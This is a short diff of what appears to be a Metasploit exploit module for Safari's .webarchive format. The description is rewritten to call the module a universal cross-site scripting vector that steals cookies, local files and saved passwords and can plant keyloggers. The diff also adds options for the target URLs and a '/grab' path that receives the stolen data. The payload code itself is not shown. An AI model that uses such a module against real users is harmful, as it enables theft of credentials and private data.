@@ -24,8 +24,9 @@ def initialize(info = {})
24
24
in Safari's .webarchive file format. The format allows you to
25
25
specify both domain and content, so we can run arbitrary script in the
26
26
context of any domain. This allows us to steal cookies, file URLs, and saved
27
- passwords from any website we want. On sites that link to cached javascripts,
28
- we can poison the user's browser cache and install keyloggers.
27
+ passwords from any website we want -- in other words, it is a universal
28
+ cross-site scripting vector (UXSS). On sites that link to cached javascripts,
29
+ we can additionally poison user's browser cache and install keyloggers.
29
30
} ,
30
31
'License' => MSF_LICENSE ,
31
32
'Author' => 'joev' ,
@@ -47,7 +48,8 @@ def initialize(info = {})
47
48
register_options (
48
49
[
49
50
OptString . new ( 'FILENAME' , [ true , 'The file name.' , 'msf.webarchive' ] ) ,
50
- OptString . new ( 'URLS' , [ true , 'The URLs to steal cookie and form data from.' , '' ] ) ,
51
+ OptString . new ( 'URLS' , [ true , 'A space-delimited list of URLs to UXSS (eg http//browserscan.rapid7.com/' ] ) ,
52
+ OptString . new ( 'URIPATH' , [ false , 'The URI to receive the UXSS\'ed data' , '/grab' ] ) ,
51
53
OptString . new ( 'FILE_URLS' , [ false , 'Additional file:// URLs to steal.' , '' ] ) ,
52
54
OptBool . new ( 'STEAL_COOKIES' , [ true , "Enable cookie stealing." , true ] ) ,
53
55
OptBool . new ( 'STEAL_FILES' , [ true , "Enable local file stealing." , true ] ) ,
0 commit comments